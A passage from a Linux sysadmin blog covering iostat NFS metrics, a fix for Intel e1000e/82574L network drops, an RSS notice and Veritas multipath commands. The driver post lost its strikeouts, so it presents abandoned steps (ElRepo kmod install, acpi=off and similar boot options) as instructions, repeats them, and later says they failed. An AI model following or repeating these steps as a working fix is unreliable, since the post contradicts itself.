Reports the time spent in the run queue in milliseconds. For NFS filesystems, this represents the average amount of time the client waits for the reply to its RPC requests, after they have been sent to the NFS server. In the preceding example, the server assisi takes on average 93.2 milliseconds to reply to the client's requests, where the server paris takes 336.7 milliseconds. Recall that the server assisi and the client are physically connected to the same hub, whereas packets to and from the server paris have to traverse multiple switches to communicate with the client. Analysis of nfsstat -s on paris indicated a large amount of NFS traffic directed at this server at the same time. This, added to server load, accounts for the slow response time.
%w
Reports the percentage of time that transactions are present in the wait queue ready to be processed. A large number for an NFS filesytem does not necessarily indicate a problem, given that there are multiple NFS async threads that perform the work.

%b
Reports the percentage of time that actv is non-zero (at least one request is being processsed). For NFS filesystems, it represents the activity level of the server mount point. 100% busy does not indicate a problem since the NFS server has multiple nfsd threads that can handle concurrent RPC requests. It simply indicates that the client has had requests continuously processed by the server during the measurement time.

Resolved Intel e1000e driver bug on 82574L Ethernet controller causing network blipping

April 1st, 2012 11 comments

Earlier I posted a question about centos 6.2 lost internet connections intermittently. Now finally I got the right way to fix this.

Firstly, this is a known bug on Intel e1000e driver on linux platforms. This is a driver problem with the Intel 82574L(MSI/MSI-X interrupts issue). The internet connection lost itself now and then and there's nothing logged about this which is very bad for troubleshooting.
You can see more bug reporting about this at https://bugzilla.redhat.com/show_bug.cgi?id=632650

Fortunately, we can resolve this by install kmod-e1000e package from ELrepo.org. To solve this, you need do as the following(ignore lines with strikeouts):

  • Install kmod-e1000e offered by Elrepo

Import the public key:
rpm --import http://elrepo.org/RPM-GPG-KEY-elrepo.org

To install ELRepo for RHEL-5, SL-5 or CentOS-5:
rpm -Uvh http://elrepo.org/elrepo-release-5-3.el5.elrepo.noarch.rpm

To install ELRepo for RHEL-6, SL-6 or CentOS-6:
rpm -Uvh http://elrepo.org/elrepo-release-6-4.el6.elrepo.noarch.rpm

Before installing the new driver, let's see our old one:
[root@doxer sites]# lspci |grep -i ethernet
02:00.0 Ethernet controller: Intel Corporation 82574L Gigabit Network Connection
03:00.0 Ethernet controller: Intel Corporation 82574L Gigabit Network Connection

[root@doxer modprobe.d]# lsmod|grep e100
e1000e 219500 0

[root@doxer modprobe.d]# modinfo e1000e
filename: /lib/modules/2.6.32-220.7.1.el6.x86_64/kernel/drivers/net/e1000e/e1000e.ko
version: 1.4.4-k
license: GPL
description: Intel(R) PRO/1000 Network Driver
author: Intel Corporation, <linux.nics@intel.com>
srcversion: 6BD7BCA22E0864D9C8B756A

Now let's install the new kmod-e1000e offered by elrepo:
[root@doxer yum.repos.d]# yum list|grep -i e1000
kmod-e1000.x86_64 8.0.35-1.el6.elrepo elrepo
kmod-e1000e.x86_64 1.9.5-1.el6.elrepo elrepo

[root@doxer yum.repos.d]# yum -y install kmod-e1000e.x86_64

After installation, reboot your machine, and you'll find driver updated:
[root@doxer ~]# modinfo e1000e
filename: /lib/modules/2.6.32-220.7.1.el6.x86_64/weak-updates/e1000e/e1000e.ko
version: 1.9.5-NAPI
license: GPL
description: Intel(R) PRO/1000 Network Driver
author: Intel Corporation, <linux.nics@intel.com>
srcversion: 16A9E37B9207620F5453F5E

[root@doxer ~]# lsmod|grep e100
e1000e 229197 0

  • change kernel parameter
Append the following parameters to grub.conf kernel line:

pcie_aspm=off e1000e.IntMode=1,1 e1000e.InterruptThrottleRate=10000,10000 acpi=off

  • change NIC parameters(you should add these lines to /etc/rc.local)

#disable pause autonegotiate
/sbin/ethtool -A eth0 autoneg off
/sbin/ethtool -s eth0 autoneg off
#change tx ring buffer
/sbin/ethtool -G eth0 tx 4096 #maybe too large(consider 512). To increase interrupt rate, ethtool -C eth0 rx-usecs 10<10000 interrupts per second>
#change rx ring buffer
/sbin/ethtool -G eth0 rx 128
#disable wake on line
/sbin/ethtool -s eth0 wol d
#turn off offload
/sbin/ethtool -K eth0 tx off rx off sg off tso off gso off gro off
#enable TX pause
/sbin/ethtool -A eth0 tx on
#disable ASPM
/sbin/setpci -s 02:00.0 CAP_EXP+10.b=40
/sbin/setpci -s 00:19.0 CAP_EXP+10.b=40

PS:

  1. pcie_aspm is abbr for Active-State Power Management. This is somehow related to powersaving mechanism, you can get more info here.
  2. acpi is abbr for Advanced Configuration and Power Interface, you can refer to here
  3. apic is abbr for Advanced Programmable Interrupt Controller, it's somehow related to IRQ<Interrupt Request>. apic is one kind of many PICs, intel and some other NICs have this feature. You can read more info about this here.

Now reboot your machine and you're expected to have a more steady networking!

PS2:

The reason why there's so much strikeouts in this article is that I've struggled a lot with this kernel bug. Firstly, I thought it's caused by kernel bug of e1000e driver, and after some searching, I installed kmod-e1000e driver and modified the kernel parameter. Things turned better for a short time. Later, I found the issue was still there, so I tried compile the latest e1000e driver from intel. But neither this worked.

Later, I tried a script which monitored the networking of the time NIC went down. After the NIC failed for several times, I found that Tx traffic was so high each time NIC went to failure(TX bytes went up like 5Gb at a very short time). Based on this, I realized that there may be some DoS attack on the server. Using ntop & tcpdump, I found that DNS traffic was very large, but actually my host was not providing DNS services at all!

Then I wrote some iptable rules to disallow DNS queries etc, and after that, the host now is becoming steady again! Traffic went down as per normal, and everything is now on the track. I'm so happy and so excited about this as this is the first time I've stopped an DoS attack!

This problem is due to bug on Intel NICs' MSI and/or MSI-X interrupts. To solve this, you need download the latest Intel 82574L driver here. After downloading the source tarball to your server, do the following steps as the driver's README file:

  1. unzip: tar zxf e1000e-x.x.x.tar.gz
  2. cd e1000e-x.x.x/src/
  3. make CFLAGS_EXTRA=-DDISABLE_PCI_MSI install #this step is critical
  4. rmmod e1000e; modprobe e1000e
  5. add e1000e to /etc/modprobe.conf
  6. reboot server
After that, when you check intel e1000e driver module, you should now see:

[root@doxer ~]# modinfo e1000e
filename: /lib/modules/2.6.32-220.7.1.el6.x86_64/kernel/drivers/net/ethernet/intel/e1000e/e1000e.ko
version: 1.10.6-NAPI
license: GPL
description: Intel(R) PRO/1000 Network Driver
author: Intel Corporation, <linux.nics@intel.com>

.....blablabla.....

vermagic:       2.6.32-220.7.1.el6.x86_64 SMP mod_unload modversions

parm: copybreak:Maximum size of packet that is copied to a new buffer on receive (uint)
parm: TxIntDelay:Transmit Interrupt Delay (array of int)
parm: TxAbsIntDelay:Transmit Absolute Interrupt Delay (array of int)
parm: RxIntDelay:Receive Interrupt Delay (array of int)
parm: RxAbsIntDelay:Receive Absolute Interrupt Delay (array of int)
parm: InterruptThrottleRate:Interrupt Throttling Rate (array of int)
parm: IntMode:Interrupt Mode (array of int)
parm: SmartPowerDownEnable:Enable PHY smart power down (array of int)
parm: KumeranLockLoss:Enable Kumeran lock loss workaround (array of int)
parm: CrcStripping:Enable CRC Stripping, disable if your BMC needs the CRC (array of int)
parm: EEE:Enable/disable on parts that support the feature (array of int)
parm: Node:[ROUTING] Node to allocate memory on, default -1 (array of int)

And also, you may need to add pcie_aspm=off to the kernel cmd line in file /boot/grub/menu.lst to disable Active-State Power Management which may cause problems.

That's all steps to fix Intel e1000e driver bug on 82574L Ethernet controller.

NOTE:Please do not do steps below, it's proved not able to solve this 82574L driver bug!

Fortunately, we can resolve this by install kmod-e1000e package from ELrepo.org, here's all steps you need:
Import the public key:
rpm --import http://elrepo.org/RPM-GPG-KEY-elrepo.org

To install ELRepo for RHEL-5, SL-5 or CentOS-5:
rpm -Uvh http://elrepo.org/elrepo-release-5-3.el5.elrepo.noarch.rpm

To install ELRepo for RHEL-6, SL-6 or CentOS-6:
rpm -Uvh http://elrepo.org/elrepo-release-6-4.el6.elrepo.noarch.rpm

Before installing the new driver, let's see our old one:
[root@doxer sites]# lspci |grep -i ethernet
02:00.0 Ethernet controller: Intel Corporation 82574L Gigabit Network Connection
03:00.0 Ethernet controller: Intel Corporation 82574L Gigabit Network Connection

[root@doxer modprobe.d]# lsmod|grep e100
e1000e 219500 0

[root@doxer modprobe.d]# modinfo e1000e
filename: /lib/modules/2.6.32-220.7.1.el6.x86_64/kernel/drivers/net/e1000e/e1000e.ko
version: 1.4.4-k
license: GPL
description: Intel(R) PRO/1000 Network Driver
author: Intel Corporation, <linux.nics@intel.com>
srcversion: 6BD7BCA22E0864D9C8B756A

Now let's install the new kmod-e1000e offered by elrepo:
[root@doxer yum.repos.d]# yum list|grep -i e1000
kmod-e1000.x86_64 8.0.35-1.el6.elrepo elrepo
kmod-e1000e.x86_64 1.9.5-1.el6.elrepo elrepo

[root@doxer yum.repos.d]# yum -y install kmod-e1000e.x86_64

After installation, reboot your machine, and you'll find driver updated:
[root@doxer ~]# modinfo e1000e
filename: /lib/modules/2.6.32-220.7.1.el6.x86_64/weak-updates/e1000e/e1000e.ko
version: 1.9.5-NAPI
license: GPL
description: Intel(R) PRO/1000 Network Driver
author: Intel Corporation, <linux.nics@intel.com>
srcversion: 16A9E37B9207620F5453F5E

[root@doxer ~]# lsmod|grep e100
e1000e 229197 0

And also, you may need to add pcie_aspm=off to the kernel cmd line in file /boot/grub/menu.lst to disable Active-State Power Management which may cause problems.

 

 

You should get a better networking on linux now. Enjoy!

PS:

 

Actually, there're lot of talks over the internet about this problem, then I know it's not only me who was annoyed by this weird problem!

 

http://www.google.com.hk/search?hl=en&newwindow=1&safe=strict&q=Intel+e1000e+driver+bug&oq=Intel+e1000e+driver+bug&aq=f&aqi=&aql=&gs_l=serp.3...9108l9252l0l9707l2l2l0l0l0l0l0l0ll0l0.frgbld.

Dear RSS readers, please re-subscribe to this feed

April 1st, 2012 No comments

Dear RSS readers,

I'm very sorry but I've changed my blog's feed address to a new one http://feeds2.feedburner.com/doxerorg/learnlinuxblog. Can you please unsubscribe and subscribe to this new RSS address?

Sorry again for the inconvenience, I'll try share what I learns to all you guys and Internet just as before(let's call it open source spirit).

Thanks, and have a good day!

Categories: IT Architecture, Linux, Systems Tags:

use vxdmpadm to set IBM xiv’s enclosure iopolicy to round-robin

April 1st, 2012 No comments

#!/bin/ksh

for xiv in $(/usr/sbin/vxdmpadm listenclosure all | awk ‘{print $1}’ | grep xiv)

do
vxdmpadm setattr enclosure $xiv iopolicy=round-robin
done

Categories: Hardware, Storage Tags:

check multipath information on solaris or linux

April 1st, 2012 No comments

If the FS is vxfs:

vxdmpadm listctlr all
symmask list hba
for i in `vxdisk list | grep -v DEVICE | awk '{print $1}'`; do vxdmpadm getsubpaths dmpnodename=$i;done

If the host is solaris:

 /usr/sbin/cfgadm -la|grep fabric && vxdisk list

If there's DISABLED after checking, first check your hardware connection, after that do a symcfg discover to refresh symantec database files on the host, and then use vxdmpadm enable ctlr=<your controller tag> to enable the controller or use vxdmpadm enable path=<your path tag> to enable the specific path's DMP.

If you want to check the HBA's info, you may try:

symmask list hba #symantec

fcinfo hba-port -l #solaris

Or refer to this article.